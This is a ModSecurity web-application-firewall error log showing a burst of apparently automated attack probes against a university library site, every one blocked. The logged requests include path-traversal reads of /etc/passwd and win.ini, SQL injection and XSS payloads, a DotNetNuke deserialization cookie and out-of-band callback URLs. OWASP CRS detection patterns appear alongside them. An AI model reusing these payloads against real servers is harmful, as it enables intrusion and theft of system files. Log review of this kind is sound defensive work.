[Tue Aug 29 11:42:32.373020 2023] [:error] [pid 1910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26g8jix8us7seqka.oast.site found within TX:1: cjmnbitjmimt14dgn26g8jix8us7seqka.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/adm/krgourl.php"] [unique_id "ZO13OMCo-f0AAAd230cAAAAI"]
[Tue Aug 29 11:42:32.401543 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at REQUEST_COOKIES:DNNPersonalization. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: MethodName>WriteFile found within REQUEST_COOKIES:DNNPersonalization: <profile><item key=\\x22name1: key1\\x22 type=\\x22System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\\x22><ExpandedWrapperOfFileSyst [hostname "digilibft.unla.ac.id"] [uri "/__"] [unique_id "ZO13OMCo-f0AAAdb7kYAAAAb"]
[Tue Aug 29 11:42:33.387948 2023] [:error] [pid 1923] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within XML: file_datafile_name`{}`.pptx| |cat/etc/passwd||a #service_ppt2lp_size720x540"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/main/webservices/additional_webservices.php"] [unique_id "ZO13OcCo-f0AAAeDipcAAAAx"]
[Tue Aug 29 11:42:34.438489 2023] [:error] [pid 1921] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:file: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/avatar_uploader.pages.inc"] [unique_id "ZO13OsCo-f0AAAeB1oQAAAAv"]
[Tue Aug 29 11:42:40.403792 2023] [:error] [pid 1915] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:query: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/filter/jmol/js/jsmol/php/jsmol.php"] [unique_id "ZO13QMCo-f0AAAd7fVAAAAAq"]
[Tue Aug 29 11:42:40.432046 2023] [:error] [pid 1917] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php"] [unique_id "ZO13QMCo-f0AAAd9UMUAAAAr"]
[Tue Aug 29 11:42:41.497583 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:c: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO13QcCo-f0AAAdeQ24AAAAQ"]
[Tue Aug 29 11:42:42.397206 2023] [:error] [pid 1885] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:tpl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:tpl: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/badging/badge_print_v0.php"] [unique_id "ZO13QsCo-f0AAAddJs0AAAAh"]
[Tue Aug 29 11:42:43.439209 2023] [:error] [pid 1893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:calculate_attribute_counts[0][query_type]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:calculate_attribute_counts[0][query_type]: calculate_attribute_counts[0][query_type]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO13Q8Co-f0AAAdlvcIAAAAl"]
[Tue Aug 29 11:42:46.361147 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:path: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/scripts/logdownload.php"] [unique_id "ZO13RsCo-f0AAAdSZNYAAAAX"]
[Tue Aug 29 11:42:46.478951 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:fileName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/servlets/FetchFile"] [unique_id "ZO13RsCo-f0AAAeX1BUAAAAK"]
[Tue Aug 29 11:42:47.379122 2023] [:error] [pid 1893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/Visitor/bin/WebStrings.srf"] [unique_id "ZO13R8Co-f0AAAdlvc0AAAAl"]
[Tue Aug 29 11:42:47.415000 2023] [:error] [pid 1912] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:modname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../ found within ARGS:modname: misc/../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/opensis/ajax.php"] [unique_id "ZO13R8Co-f0AAAd4ayQAAAAj"]
[Tue Aug 29 11:42:48.422378 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:apiKey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:apiKey: -cjmnbitjmimt14dgn26g5mq5b1nie4gmy.oast.site/test/test/test?key1=val1&dummy="] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13SMCo-f0AAAdftT4AAAAG"]
[Tue Aug 29 11:42:48.494533 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13SMCo-f0AAAdftT8AAAAG"]
[Tue Aug 29 11:42:48.505202 2023] [:error] [pid 1959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:modname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../ found within ARGS:modname: misc/../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO13SMCo-f0AAAenGX4AAAAM"]
[Tue Aug 29 11:42:50.369337 2023] [:error] [pid 1959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:comment. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:comment: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/reviewInput.php"] [unique_id "ZO13SsCo-f0AAAenGYAAAAAM"]
[Tue Aug 29 11:42:51.362391 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../ found within ARGS:filename: /../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO13S8Co-f0AAAbo-esAAAAi"]
[Tue Aug 29 11:42:51.364881 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO13S8Co-f0AAAeChYMAAAAw"]
[Tue Aug 29 11:42:52.381670 2023] [:error] [pid 1876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:task. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:task: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13TMCo-f0AAAdUc3YAAAAZ"]
[Tue Aug 29 11:42:53.356540 2023] [:error] [pid 1917] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:file_name: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/webui/"] [unique_id "ZO13TcCo-f0AAAd9UNUAAAAr"]
[Tue Aug 29 11:42:53.389727 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:installation_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:installation_path: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/assets/php/_devtools/installer/step_2.php"] [unique_id "ZO13TcCo-f0AAAeChYcAAAAw"]
[Tue Aug 29 11:42:54.405476 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:installation_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:installation_path: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/qcubed/assets/php/_devtools/installer/step_2.php"] [unique_id "ZO13TsCo-f0AAAdxUTEAAAAC"]
[Tue Aug 29 11:42:54.426349 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:file_name: ../../../../../../../../../../../../c:/windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/webui/"] [unique_id "ZO13TsCo-f0AAARpg3IAAAAU"]
[Tue Aug 29 11:42:57.435724 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:oldfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:oldfile: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/dlibrary/null"] [unique_id "ZO13UcCo-f0AAAcsLHgAAAAE"]
[Tue Aug 29 11:42:59.606523 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/wt3/forceSave.php"] [unique_id "ZO13U8Co-f0AAARpg3kAAAAU"]
[Tue Aug 29 11:43:00.409941 2023] [:error] [pid 1485] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:id: 1||(updatexml(1,concat(0x7e,(select md5(999999999))),1))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/delete_cart_goods.php"] [unique_id "ZO13VMCo-f0AAAXNuYQAAAAg"]
[Tue Aug 29 11:43:00.410262 2023] [:error] [pid 1945] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0:8080/ found within TX:1: 0:8080/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/proxy"] [unique_id "ZO13VMCo-f0AAAeZ554AAAAN"]
[Tue Aug 29 11:43:00.480146 2023] [:error] [pid 1945] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"username":"admin","password":"admin"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS_NAMES:{\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22admin\\x22}: {\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22admin\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/send_order.cgi"] [unique_id "ZO13VMCo-f0AAAeZ56AAAAAN"]
[Tue Aug 29 11:43:02.428343 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:zero. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:zero: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13VsCo-f0AAAdQ3jYAAAAV"]
[Tue Aug 29 11:43:03.420219 2023] [:error] [pid 1945] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13V8Co-f0AAAeZ56YAAAAN"]
[Tue Aug 29 11:43:04.392265 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Object. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:Object: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO13WMCo-f0AAAcoNmgAAAAF"]
[Tue Aug 29 11:43:04.483235 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/mdc-youtube-downloader/includes/download.php"] [unique_id "ZO13WMCo-f0AAAeX1D4AAAAK"]
